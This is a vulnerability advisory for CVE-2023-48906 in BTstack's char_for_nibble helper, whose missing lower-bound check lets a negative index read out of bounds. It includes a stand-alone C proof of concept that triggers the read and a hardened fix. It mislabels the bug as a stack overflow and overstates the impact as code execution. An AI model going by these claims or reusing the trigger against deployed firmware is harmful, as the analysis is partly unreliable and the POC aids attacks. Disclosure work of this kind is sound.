CVE-2023-48906
GitHub: https://github.com/bluekitchen/btstack/issues/546
The name of the affected product: BTstack
The affected or fixed version(s): version <= v1.6
CVE ID: CVE-2023-48906
Vulnerability Type: Stack overflow
Description & Root Cause
In the btstack source code, we can find an interesting piece of code.
    char char_for_nibble(int nibble){
        static const char * char_to_nibble = "0123456789ABCDEF";
        if (nibble < 16){
            return char_to_nibble[nibble];
        } else {
            return '?';
        }
    }

    static inline char char_for_high_nibble(int value){
        return char_for_nibble((value >> 4) & 0x0f);
    }

    static inline char char_for_low_nibble(int value){
        return char_for_nibble(value & 0x0f);
    }
The parameter "value" passed to the function "char_for_high_nibble" in the btstack source code is of type int. However, after the XOR operation, it is possible for "value" to become a negative number. In this case, the if statement inside the "char_for_nibble" function does not behave as expected: it only tests the upper bound, so any negative "nibble" satisfies "nibble < 16" and is used as an array index.

    if (nibble < 16){
        return char_to_nibble[nibble];
    } else {
        return '?';
    }

As a result, a negative index reads memory outside the char_to_nibble array, causing a stack overflow.
Here is the POC code.
    #include <stdbool.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    #include <math.h>

    typedef uint8_t u8;
    typedef uint16_t u16;
    typedef uint32_t u32;
    typedef uint64_t u64;
    typedef unsigned int usize;
    typedef int8_t i8;
    typedef int16_t i16;
    typedef int32_t i32;
    typedef int64_t i64;
    typedef int isize;
    typedef float f32;
    typedef double f64;

    /* Vulnerable helper, copied from the btstack source quoted above so the
     * POC builds stand-alone; the missing lower-bound check is the bug. */
    char char_for_nibble(int nibble){
        static const char * char_to_nibble = "0123456789ABCDEF";
        if (nibble < 16){
            return char_to_nibble[nibble];
        } else {
            return '?';
        }
    }

    int main(void) {
        i32 v0 = -2147483643; // nibble: negative, so "nibble < 16" still holds
        i8 v1 = char_for_nibble(v0); // $target: reads char_to_nibble[-2147483643], out of bounds
        printf("%d\n", v1);
        return 0;
    }
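A hardened form of the helper, added here as an example and not taken from the BTstack repository or its fix: the lower bound is checked as well (or the parameter is made unsigned, so a negative argument becomes a large value that the upper-bound test rejects), and a byte-to-hex helper masks before calling it. The names `char_for_nibble_checked`, `char_for_nibble_unsigned` and `hex_byte_to_chars` are assumed for this example.

```c
#include <stdio.h>

/* The lookup table is a 16-character string literal: a valid index is 0..15. */
static const char NIBBLE_CHARS[] = "0123456789ABCDEF";

/* Hardened variant: reject negative indexes as well as indexes >= 16.
 * With the original "nibble < 16" test alone, a negative nibble passes
 * the check and indexes memory before the table. */
char char_for_nibble_checked(int nibble) {
    if (nibble >= 0 && nibble < 16) {
        return NIBBLE_CHARS[nibble];
    }
    return '?';
}

/* Same idea with an unsigned parameter: a negative argument converts to a
 * large positive value, which the single upper-bound check rejects. */
char char_for_nibble_unsigned(unsigned int nibble) {
    return (nibble < 16u) ? NIBBLE_CHARS[nibble] : '?';
}

/* Render one byte as two hex characters. Masking with 0x0f before the call
 * guarantees the helper only ever sees 0..15, whatever the sign of value. */
void hex_byte_to_chars(int value, char out[2]) {
    out[0] = char_for_nibble_checked((value >> 4) & 0x0f);
    out[1] = char_for_nibble_checked(value & 0x0f);
}

int main(void) {
    char buf[3] = {0};
    hex_byte_to_chars(-1, buf);                 /* low byte of -1 is 0xFF */
    printf("-1 -> %s\n", buf);                  /* FF */
    /* The POC's direct call with a negative nibble now yields '?' instead
     * of an out-of-bounds read. */
    printf("direct -2147483643 -> %c\n", char_for_nibble_checked(-2147483643));
    return 0;
}
```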
Impact
The hazards of stack overflow include the following aspects:
Code Execution Control: A local stack overflow vulnerability can allow an attacker to manipulate the program's execution flow by carefully crafting malicious input. By overflowing the stack and overwriting critical control data, such as function return addresses, an attacker can gain control over the program's execution. This control can be used to redirect the program's flow to malicious code, enabling unauthorized operations and exploitation of other security vulnerabilities.
Denial of Service (DoS): Stack overflow vulnerabilities can also lead to denial of service attacks, causing the target system to crash or become unresponsive. By sending specific malicious input, an attacker can trigger a stack overflow, causing the program to crash or enter an infinite loop, depleting system resources and rendering the system unresponsive.